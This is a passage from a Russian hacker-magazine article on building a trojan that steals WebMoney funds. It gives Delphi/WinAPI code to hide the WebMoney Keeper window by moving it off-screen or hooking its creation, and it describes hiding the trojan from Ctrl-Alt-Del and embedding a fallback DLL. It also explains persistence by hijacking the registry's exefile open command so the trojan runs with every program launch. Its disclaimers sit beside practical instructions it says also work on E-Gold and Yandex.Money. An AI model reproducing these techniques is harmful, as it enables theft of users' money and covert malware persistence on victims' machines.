Уводим WebMoney

SIR (sir-xaker@mail.ru)

Хакер, номер #090, стр. 090-116-5

Еще можно использовать WinAPI-функции и просто оттащить появившееся окно за пределы экрана:

SetWindowPos((<хэндл нужного окна>,0,2000,2000,0,0,SWP_NOSIZE);

Тут 2000 - это координаты X и Y экрана. Недостаток этого метода лишь в том, что, несмотря на использование оператора repeat, окно все равно успеет прорисоваться, а значит, будет замечен эффект «передергивания» окна. Идеальным вариантом будет использование hook’a на создание окна (про хуки полно документации в инете).

Хук на отлов окон до их прорисовки на экране монитора

Function WndHookProc(nCode:Integer;wParam:UINT;lParam:UINT):LRESULT; stdcall;

begin

KeeperWnd:=FindWindow(nil,PChar('WebMoney Keeper'));

if nCode>=0 then

if PCWPStruct(lParam).Message=WM_SHOWWINDOW then begin

// Делаем над окнами все, что нам нужно

end;

Result:=CallNextHookEx(HookHandle,nCode,wParam,lParam);

end;

Теперь о том, как скрыть наш троян от Ctrl-Alt-Del. Делается это очень просто, посредством хука. Исходник этого хука, включая отлов окон, ты можешь найти на диске. Важно отметить, что dll будет вызываться динамически: если нашу библиотеку запалят, то программа все равно будет продолжать работать и сможет вытащить из себя другую dll. Разумеется, предварительно ее нужно вставить в exe-файл. Это увеличит размеры программы, но зато он будет непреступен. Код вызова такой библиотеки смотри во врезке.

Теперь пару слов об автозагрузке вируса. Большая часть всех троянов использует обычную автозагрузку в реестре: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Но это палевно. Намного лучше будет юзать эту ветвь реестра: HKEY_CLASSES_ROOT\exefile\shell\open\command, изменив значение "%1" %* на ‘имя_вируса.exe "%1" %*’. Теперь, открывая любой exe-файл, будет запускаться наш троян. Чтобы exe-файлы могли загружаться, в вирус нужно обязательно вставить такую строку:

WinExec(PANSIChar(ParamStr(1)),SW_Restore);

Итого

В своей статье я подробно описал весь процесс перевода, но главное - сам метод! Используя такую схему, злобный хакер сможет похищать электронные деньги не только с WebMoney, но и с любых других систем: E-Gold, Яндекс.деньги и т.д.

Конечно же, я никоим образом не призываю всех этим заниматься! Это очень низко и гадко! Это не хакерство, а настоящее киберпадонство! Автор и редакция не собираются нести никакой ответственности за использование данной статьи в ваших грязных целях!

Если у тебя есть какие-нибудь интересные идеи, замечания, предложения – можешь поделиться ими со мной.

DVD

На DVD лежит исходники хука на отлов окон и хук на скрытие от Ctrl-Alt-Del, а также код распознавания цифр. Для работы с ними тебе понадобится компилятор Delphi.

WWW

Про WinAPI можно почитать тут: http://winapi.by.ru/

WWW

Про хуки гляди здесь: www.rsdn.ru/article/baseserv/winhooks.xml

WARNING

Автор и редакция не несут никакой ответственности за использование материалов данной статьи в противозаконных целях! Это статья – лишь пример использования WinAPI-сообщений для управления другими приложениями. Проверяй этот материал только на своих WM-кошельках.